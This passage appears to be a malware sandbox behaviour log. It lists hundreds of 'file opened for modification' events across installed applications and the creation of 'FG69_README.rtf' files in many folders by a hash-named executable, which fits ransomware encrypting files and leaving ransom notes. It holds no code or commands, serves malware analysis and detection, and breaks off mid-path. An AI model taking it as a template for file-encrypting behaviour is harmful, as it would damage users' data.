d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\resources.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\resources.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\security\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nb.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Update\Install\{C2992E49-2AEA-49C3-A145-FACF92F54BB3}\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\youtube.crx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Casablanca d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\vi.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\gmail.crx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Luis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Khandyga d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ru.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoBeta.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Mail\wab.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\et.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SkipShow.wav d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program 